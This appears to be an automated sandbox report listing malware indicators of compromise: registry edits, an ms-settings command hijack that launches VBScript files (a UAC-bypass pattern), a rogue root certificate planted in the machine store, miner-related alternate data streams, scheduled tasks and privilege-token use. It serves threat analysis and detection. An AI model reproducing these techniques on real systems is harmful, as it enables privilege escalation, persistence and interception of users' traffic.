description ioc Process Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN install_lodop32.exe Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe = "0" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings install_lodop32.exe Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings\LOCALMACHINE_CD_UNLOCK = "0" install_lodop32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = f8e31e226540db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 7e27006f6540db01 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = 93ee955a6540db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = dcb48a826540db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-2d-69-5d-86-0b\WpadDecisionTime = a4195e346540db01 svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ System.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ 7zFM.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8504.vbs" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\HELPDIR install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Version\ = "6.0" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\1 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\ install_lodop32.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4284.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0\win32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ = "C:\\PROGRA~2\\MOUNTT~1\\Lodop\\CAOSOF~1.OCX" install_lodop32.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ = "ILodopX" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID\ = "Lodop.LodopX" install_lodop32.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\CAOSOFT_WEB_PRINT_lodop.ocx,0" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 install_lodop32.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1998.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\FLAGS\ = "2" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ThreadingModel = "Apartment" install_lodop32.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED} install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32 install_lodop32.exe Key deleted \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E} install_lodop32.exe Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\Version = "6.0" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA} install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\0\ = "Properties,0,2" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ frap.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB} install_lodop32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 windowsexecutable.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 windowsexecutable.exe -
NTFS ADS 3 IoCs
description ioc Process File created C:\IMG001.exe\:P:$DATA IMG001.exe File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 7480 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 26 IoCs
pid Process 892 PING.EXE 7212 PING.EXE 8736 PING.EXE 3664 PING.EXE 3388 PING.EXE 4428 PING.EXE 4308 PING.EXE 8104 PING.EXE 10584 PING.EXE 10056 PING.EXE 9944 PING.EXE 1492 PING.EXE 1548 PING.EXE 8072 PING.EXE 11136 PING.EXE 11200 PING.EXE 10992 PING.EXE 10948 PING.EXE 7852 PING.EXE 4208 PING.EXE 1212 PING.EXE 3636 PING.EXE 4868 PING.EXE 1792 PING.EXE 10692 PING.EXE 10776 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1532 schtasks.exe 5428 schtasks.exe 8232 schtasks.exe 320 schtasks.exe 7476 schtasks.exe 8640 schtasks.exe 2640 schtasks.exe 3708 schtasks.exe 4804 schtasks.exe 4868 schtasks.exe 3064 schtasks.exe 3592 schtasks.exe 3636 schtasks.exe 2304 schtasks.exe 4224 schtasks.exe 3024 schtasks.exe 548 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5920 tuwhzy.exe 7084 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe 1680 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3892 7zFM.exe 1680 taskmgr.exe 3564 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe 5212 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3892 7zFM.exe Token: 35 3892 7zFM.exe Token: SeSecurityPrivilege 3892 7zFM.exe Token: SeDebugPrivilege 1680 taskmgr.exe Token: SeSystemProfilePrivilege 1680 taskmgr.exe Token: SeCreateGlobalPrivilege 1680 taskmgr.exe Token: SeDebugPrivilege 4960 New Text Document mod.exe Token: SeDebugPrivilege 3892 4363463463464363463463463.exe Token: SeDebugPrivilege 2484 built.exe Token: SeDebugPrivilege 4384 PerfWatson1.exe Token: SeDebugPrivilege 640 PerfWatson1.exe Token: SeDebugPrivilege 4384 PerfWatson1.exe Token: SeDebugPrivilege 1432 9758xBqgE1azKnB.exe Token: SeDebugPrivilege 4268 PerfWatson1.exe Token: SeDebugPrivilege 992 PerfWatson1.exe Token: SeDebugPrivilege 4500 PerfWatson1.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 3756 9758xBqgE1azKnB.exe Token: SeIncreaseQuotaPrivilege 4268 powershell.exe Token: SeSecurityPrivilege 4268 powershell.exe Token: SeTakeOwnershipPrivilege 4268 powershell.exe Token: SeLoadDriverPrivilege 4268 powershell.exe Token: SeSystemProfilePrivilege 4268 powershell.exe Token: SeSystemtimePrivilege 4268 powershell.exe Token: SeProfSingleProcessPrivilege 4268 powershell.exe Token: SeIncBasePriorityPrivilege 4268 powershell.exe Token: SeCreatePagefilePrivilege 4268 powershell.exe Token: SeBackupPrivilege 4268 powershell.exe Token: SeRestorePrivilege 4268 powershell.exe Token: SeShutdownPrivilege 4268 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeSystemEnvironmentPrivilege 4268 powershell.exe Token: SeRemoteShutdownPrivilege 4268 powershell.exe Token: SeUndockPrivilege 4268 powershell.exe Token: SeManageVolumePrivilege 4268 powershell.exe Token: 33 4268 powershell.exe Token: 34 4268 powershell.exe Token: 35 4268 powershell.exe Token: 36 4268 powershell.exe Token: SeDebugPrivilege 3756 9758xBqgE1azKnB.exe Token: SeDebugPrivilege 4224 PerfWatson1.exe Token: SeDebugPrivilege 1316 PerfWatson1.exe Token: SeDebugPrivilege 3084 Client_protected.exe Token: SeDebugPrivilege 1324 PerfWatson1.exe Token: SeIncreaseQuotaPrivilege 3084 Client_protected.exe Token: SeSecurityPrivilege 3084 Client_protected.exe Token: SeTakeOwnershipPrivilege 3084 Client_protected.exe Token: SeLoadDriverPrivilege 3084 Client_protected.exe Token: SeSystemProfilePrivilege 3084 Client_protected.exe Token: SeSystemtimePrivilege 3084 Client_protected.exe Token: SeProfSingleProcessPrivilege 3084 Client_protected.exe Token: SeIncBasePriorityPrivilege 3084 Client_protected.exe Token: SeCreatePagefilePrivilege 3084 Client_protected.exe Token: SeBackupPrivilege 3084 Client_protected.exe Token: SeRestorePrivilege 3084 Client_protected.exe Token: SeShutdownPrivilege 3084 Client_protected.exe Token: SeDebugPrivilege 3084 Client_protected.exe Token: SeSystemEnvironmentPrivilege 3084 Client_protected.exe Token: SeRemoteShutdownPrivilege 3084 Client_protected.exe Token: SeUndockPrivilege 3084 Client_protected.exe Token: SeManageVolumePrivilege 3084 Client_protected.exe Token: 33 3084 Client_protected.exe Token: 34 3084 Client_protected.exe Token: 35 3084 Client_protected.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
